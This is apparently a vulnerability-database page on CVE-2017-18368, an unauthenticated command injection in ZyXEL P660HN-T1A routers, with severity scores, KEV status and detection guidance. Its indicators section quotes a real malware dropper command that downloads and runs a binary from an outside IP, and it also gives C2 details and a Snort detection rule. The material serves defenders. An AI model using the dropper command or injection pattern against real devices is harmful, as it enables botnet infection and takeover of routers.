cbcvebase.
CVE-2017-18368
published 2019-05-02

CVE-2017-18368: The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System…

PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-08-28
Exploited in the wild
EPSS
94.51%
99.8th percentile
The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.

Affected

3 ranges
VendorProductVersion rangeFixed in
billion5200w-t_firmware
zyxelp660hn-t1a_v1_firmware
zyxelp660hn-t1a_v2_firmware

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://185.172.110[.]224/arm7
urlhttp://185.172.110[.]224/mips
ip185.172.110.224
port993
hash676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07
path/cgi-bin/ViewLog.asp
commandcd /tmp;wget http://185.172.110[.]224/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7
filenamearm7
path/tmp/mips
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/ViewLog.asp"; startswith; endswith; http.request_body; content:"remote_submit_Flag="; startswith; content:"&remote_host="; distance:0; content:"&remoteSubmit=Save|0d 0a 0d 0a|"; endswith; fast_pattern; reference:url,seclists.org/fulldisclosure/2017/Jan/40; reference:cve,2017-18368; reference:url,github.com/pedrib/PoC/blob/master/advisories/zyxel_trueonline.txt; classtype:attempted-user; sid:2027092; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2017_18368, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
  • Exploit targets POST /cgi-bin/ViewLog.asp with injection via the remote_host parameter; look for semicolons and shell commands (wget, chmod) in the remote_host field of HTTP POST bodies to this endpoint.
  • The exploit HTTP request uses the distinctive User-Agent string 'Ankit'; alert on POST requests to /cgi-bin/ViewLog.asp with this User-Agent.
  • The POST body always begins with 'remote_submit_Flag=' and contains '&remote_host=' followed by injected shell commands; use these as body content anchors for detection (ET SID 2027092).
  • Malware dropper payload drops ARM7 binary to /tmp and executes it with argument 'zyxel'; monitor for process execution of files dropped to /tmp on embedded Linux devices.
  • C2 communication occurs over TCP port 993 (typically associated with IMAPS) to the dropper server; monitor for outbound TCP/993 connections from IoT/router devices to unexpected IPs.
  • The exploit is accessible without authentication; any unauthenticated POST to /cgi-bin/ViewLog.asp should be treated as suspicious on ZyXEL P660HN-T1A devices.
  • ·The vulnerability affects specifically the TrueOnline-distributed ZyXEL P660HN-T1A v1 firmware (TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31); other P660HN-T v1 variants in other countries may also be vulnerable but were not confirmed in a live environment.
  • ·The Metasploit module was tested only in an emulated environment, not on a live physical device; real-world behavior may differ.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.